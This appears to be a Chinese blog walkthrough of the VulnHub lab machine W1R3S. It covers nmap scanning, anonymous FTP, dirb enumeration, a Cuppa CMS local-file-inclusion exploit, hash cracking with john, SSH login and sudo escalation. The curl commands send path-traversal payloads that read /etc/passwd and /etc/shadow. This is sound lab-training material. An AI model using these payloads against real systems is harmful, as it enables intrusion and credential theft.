渗透项目(五):W1R3S

项目地址:W1R3S: 1.0.1 ~ VulnHub

1、W1R3S的考察点:

1)信息收集:

1、nmap挖掘信息。2、页面枚举。3、Cuppa CMS LFI

2)提权:

1、sudo提权

2、渗透过程:

1)、将下载好的靶机解压到VMware中打开。

2)、打开kali,查看本机ip地址,同时查看同网段的地址输入:

ifconfig     #查看到ip地址为192.168.188.128

nmap -sP 192.168.188.1/24     #查看同网段存活的主机

发现靶机192.168.188.131

渗透项目(五):W1R3S_第1张图片

3)对靶机进行信息收集,输入:

nmap -p- 192.168.188.131   #收集靶机开放的端口

nmap 192.168.188.131 -sS -sV -A  -T5   #收集靶机具体的端口以及底层的信息 

渗透项目(五):W1R3S_第2张图片

发现有21、22、80、3306端口,所以可以想到21端口是否存在未授权登录,像渗透项目四一样,可以匿名登录。22端口可能存在ssh爆破。80端口的web服务可能出现一些web漏洞可以利用等等。

渗透项目(五):W1R3S_第3张图片

 用nmap挖掘到了更多的信息,这里ftp可以进行未授权访问,输入:

ftp 192.168.188.131   #进行anonymous访问,用户名是anonymous,密码随便或者直接回车。

dir    #发现有三个文件夹

利用get 依次将其下载到kali本地

渗透项目(五):W1R3S_第4张图片

下载到本地后依次打开,发现并没有什么有用的东西。

4)对22端口爆破,没有详细的信息没办法生成特别管用的密码文件,也没有爆破出来。然后去查看80端口的web服务,浏览器输入靶机ip地址,发现是个apache的主页。再没什么信息发现。

渗透项目(五):W1R3S_第5张图片 5)下面就可以用dirb对网站进行枚举,输入:

dirb http://192.168.188.131/

渗透项目(五):W1R3S_第6张图片

发现了这样的路径,输入该路径发现这是一个Cuppa CMS框架

渗透项目(五):W1R3S_第7张图片

也可以输入    来查看是什么框架

whatweb http://192.168.188.131/administrator/installation/

6)搜索Cuppa CMS 的exploit,发现了id号为 25971 

渗透项目(五):W1R3S_第8张图片

这是一个文件包含漏洞。可以在kali本地输入:

searchsploit 25971   #查找漏洞

然后就之前的统一操作,locate然后cp到/home/kali,然后打开文件查看该exploit怎么使用

渗透项目(五):W1R3S_第9张图片这里将里面的target改为靶机地址,然后在浏览器输入:

渗透项目(五):W1R3S_第10张图片

发现没有什么东西输出,url里是get请求,猜测应该是需要post请求。

在终端输入curl --help查看,curl是一个发送请求的命令

curl --data-urlencode urlConfig=../../../../../../../../../etc/passwd http://192.168.188.131/administrator/alerts/alertConfigField.php 

渗透项目(五):W1R3S_第11张图片

发现了一个用户,然后输入:

curl -s --data-urlencode urlConfig=../../../../../../../../../etc/shadow http://192.168.188.131/administrator/alerts/alertConfigField.php 

渗透项目(五):W1R3S_第12张图片

将这一长串,复制到一个txt文档中,利用john去破解

渗透项目(五):W1R3S_第13张图片

破解出来用户是w1r3s,密码是computer

7)利用ssh去远程登录下靶机,输入:

ssh [email protected]

渗透项目(五):W1R3S_第14张图片

8)利用sudo提权,知道了密码,直接sudo提权,然后进入根目录,就发现了flag文件。

渗透项目(五):W1R3S_第15张图片 本次渗透就此完成!

后续会具体的学习文件包含漏洞!继续加油~继续努力~ 

你可能感兴趣的:(渗透项目,安全,web安全)